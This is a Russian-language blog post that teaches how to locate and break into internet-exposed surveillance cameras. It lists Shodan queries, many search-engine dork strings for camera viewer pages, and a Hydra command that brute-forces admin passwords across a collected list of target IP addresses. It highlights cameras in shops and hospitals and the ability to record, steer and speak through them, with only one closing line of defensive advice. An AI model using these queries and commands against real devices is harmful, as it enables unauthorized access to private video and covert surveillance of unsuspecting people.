Как найти и взломать камеры видеонаблюдения?

Как найти и взломать камеры видеонаблюдения?

Запасная Жизнь

Доброго времени суток. Сегодня поговорим о защите и доступе к камерам видеонаблюдения. Их достаточно много и используются они для разных целей. Как всегда будем использоваться стандартную базу, которая позволит нам находить такие камеры и подбирать к ним пароли. 

Теория

Большинство устройств после установки никто не настраивает или обновляет. Поэтому наша целевая аудитория находиться под популярными портам 8000, 8080 и 554. Если нужно провести сканирование сети, то лучше сразу выделять эти порты. 

Способ№1

Для наглядного примера можно посмотреть интересные запросы в поисковиках Shodan и Сensys. Рассмотрим несколько наглядных примеров с простыми запросами. 

|has_screenshot:true port:8000 // 183 результата;

|has_screenshot:true port:8080 // 1025 результатов;

|has_screenshot:true port:554 // 694 результата; 

Вот таким простым способом можно получить доступ к большому количеству открытых камер, которые размещены в интересных местах: магазинах, больницах, заправках и т.д. Рассмотрим для наглядности несколько интересных вариантов. 

Таким простым способом можно найти достаточно много интересных объектов, к которым открыт доступ. Не забывайте, что можно применять фильтр country для получения данных по странам. 

Способ №2

Можно воспользоваться поиском стандартных социальных сетей. Для этого лучше использовать заголовки страниц при просмотре изображений с камер, вот такая подборка среди самых интересных вариантов: 

 inurl:/view.shtml

 inurl:ViewerFrame?Mode=

 inurl:ViewerFrame?Mode=Refresh

 inurl:view/index.shtml

 inurl:view/view.shtml

 intitle:”live view” intitle:axis

 intitle:liveapplet

 all in title :”Network Camera Network Camera”

 intitle:axis intitle:”video server”

 intitle:liveapplet inurl:LvAppl

 intitle:”EvoCam” inurl:”webcam.html”

 intitle:”Live NetSnap Cam-Server feed”

 intitle:”Live View / - AXIS 206M”

 intitle:”Live View / - AXIS 206W”

 intitle:”Live View / - AXIS 210″

 inurl:indexFrame.shtml Axis

 intitle:start inurl:cgistart

 intitle:”WJ-NT104 Main Page”

 intitle:snc-z20 inurl:home/

 intitle:snc-cs3 inurl:home/

 intitle:snc-rz30 inurl:home/

 intitle:”sony network camera snc-p1″

 intitle:”sony network camera snc-m1″

 intitle:”Toshiba Network Camera” user login

 intitle:”i-Catcher Console - Web Monitor”

Способ №3 

Этот способ является целевым. Он применяется когда у нас есть либо одна точка и нужно подобрать пароль или мы хотим прогнать базу по стандартным паролям и найти валидные результаты. Для этих целей отлично подойдет Hydra. Для этого необходимо подготовить словар. Можно пробежаться и поискать стандартные пароли для роутеров. 

Давайте рассмотрим на конкретном примере. Есть модель камеры, DCS-2103. Она достаточно часто встречается. Работает она через порт 80. Давайте воспользуемся соответствующими данными и найдем необходимую информацию в shadan. 

Далее собираем все IP потенциальных целей, которые нам интересны. Далее формируем список. Собираем список паролей и будем все это использовать это с помощью утилиты hydra. Для этого нам необходимо добавить в папку словарь, список IP и выполнить вот такую команду:

|hydra -l admin -P pass.txt -o good.txt -t 16 -vV -M targets.txt http-get

В корневой папке должен быть файл pass.txt с паролями, логин мы используем один admin с параметром -l, если нужно задать словарь для логинов, то необходимо добавит в корневую директорию файл и прописать его с параметром -L. Подобранные результаты будут сохраняться в файле good.txt. Список IP адресов нужно добавить в корневой каталог с файлом targets.txt. Последняя фраза в команде http-get отвечает за соединение через порт 80. 

Заключение

Помните, что помимо стандартного просмотра можно делать еще фото, записывать видео и скачивать его себе. Также можно управлять камерой и поворачивать в нужные направления. А самое интересное - это возможность включать звуки и говорить на некоторых камерах. Что можно тут посоветовать? Ставить надежный пароль доступа и обязательно перебрасывать порты.